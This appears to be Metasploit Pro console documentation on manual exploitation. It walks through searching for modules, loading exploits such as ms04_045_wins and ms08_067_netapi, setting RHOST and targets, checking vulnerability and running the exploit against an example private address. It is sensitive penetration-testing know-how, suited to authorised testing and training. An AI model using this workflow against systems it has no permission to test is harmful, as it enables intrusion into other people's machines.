Manual Exploitation

An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers it to the target system. The most common types of exploit modules are buffer overflow and SQL injection exploits.

To manually run an exploit, you must choose and configure an exploit module to run against a target. You choose the exploit module based on the information you have gathered about the host. For example, if you know that the target is missing the MS08-067 patch and has port 445/139 open, you can run the MS08-067 exploit to attempt exploitation.

Module Search

Before you can configure and run an exploit, you need to search for the module. The console includes the ability to search for modules using search operators.

You use search operators to create a query based on a specific module name, path, platform, author, CVE ID, BID, OSDVB ID, module type, or application. The search returns a list of results that match the query.

The following are search operators that are available:

  • name
  • path
  • platform
  • type
  • app
  • author
  • cve
  • bid
  • osdvb

Search Syntax

To search for a module, use the following syntax:

1
$ search <search operator>:<search term>

Searching for a Module

Use the search command along with the search operator to search for a module

1
msf-pro > search platform:Windows
2
msf-pro > search type:exploit
3
msf-pro > search author:hd
4
msf-pro > search app:client
5
msf-pro > search name:ms08-067

Showing All Exploit Modules

Use the show command to view a list of the exploits that are available.

1
msf-pro > show exploits

This can take a few minutes. There are thousands of modules.

Loading a Module

Use the use command to load an exploit module. After you issue the use command, the Metasploit Console changes the command prompt to show the loaded module.

1
msf-pro > use exploit/windows/wins/ms04_045_wins
2
msf-pro exploit (ms04_045_wins) >

You can use the Tab key to complete the module path.

Resetting the Current Module Context

Use the back command to reset the prompt and to remove the module that is currently loaded.

1
msf-pro exploit (ms04_045_wins) > back
2
msf-pro >

Showing Options for a Module

Use the show command to view a list of options that are available for a particular module.

1
msf-pro > use exploit/windows/wins/ms04_045_wins
2
msf-pro exploit (ms04_045_wins) > show options

Show Required Options

After an exploit is loaded, you need to set all the required options. To find out what options are required, you can use the show missing command.

1
msf-pro > use exploit/windows/wins/ms04_045_wins
2
msf-pro exploit (ms04_045_wins) > show missing

Showing Advanced Options for a Module

Use the show command to view a list of advanced options that are available for an exploit module.

1
msf-pro > use exploit/windows/wins/ms04_045_wins
2
msf-pro exploit (ms04_045_wins) > show advanced

Setting Options for a Module

Use the set command to configure options for a module. You need to specify the option name and the option value, as shown below:

1
msf-pro exploit (ms04_045_wins) > show options
2
3
Name Current Setting Required Description
4
---- ------- ------- -------- ------------
5
RHOST
6
RPORT 445
7
8
msf-pro exploit (ms04_045_wins) > set RHOST 192.168.55.1

Showing the Targets for a Module

Use the show targets command to view a list of potentially vulnerable targets. Most modules display a list of targets that may be vulnerable to the exploit. Each target has an ID and operating system.

If you know the victim machine’s operating system and version, you can specify the target for the exploit. Some modules provide an automatic targeting option. If you are unsure of the operating system or version, you can use the automatic targeting option if it is available, to automatically detect the victim machine’s OS and version.

1
msf-pro > use exploit/windows/wins/ms04_045_wins
2
msf-pro exploit (ms04_045_wins) > show targets
3
4
Exploit targets:
5
Id Name
6
-- -----
7
0 Windows 2000 English

Check to See if a Target is Vulnerable

Most exploits are version specific. For example, ms14_012_textrange is an exploit for Internet Explorer 9, but only works against versions of IE9 that were built between July 2013 to February 2014. To use this exploit, you would need to know the exact MSHTML build the target is using.

This is where the check command becomes very handy. You can use the check command to determine if a target is vulnerable to a particular exploit.

1
msf-pro > use exploit/windows/smb/ms08_067_netapi
2
msf-pro exploit (ms08_067_netapi) > check 192.168.55.1
3
[+] 192.168.55.1:445 - the target is vulnerable.

Not all modules support the check command.

Setting the Target for an Exploit

Use the set target command to specify a target for the exploit.

1
msf-pro > use exploit/windows/wins/ms04_045_wins
2
msf-pro exploit (ms04_045_wins) > show targets
3
4
Exploit targets:
5
Id Name
6
-- -----
7
0 Windows 2000 English
8
9
msf-pro exploit (ms04_045_wins) > set target 0

Running an Exploit Module

Use the exploit or run command to run an exploit module.

1
msf-pro > use exploit/windows/wins/ms04_045_wins
2
msf-pro exploit (ms04_045_wins) > run

Resetting the Current Module Context

Use the back command to reset the command prompt and to remove the module that is currently loaded.

1
msf-pro exploit (ms04_045_wins) > back
2
msf-pro >

Reloading an Exploit

Use the reload command to refresh the metadata and methods for an exploit. This command is handy if you've edited the module while in the module context and need to update the module.

1
msf-pro exploit (ms04_045_wins) > reload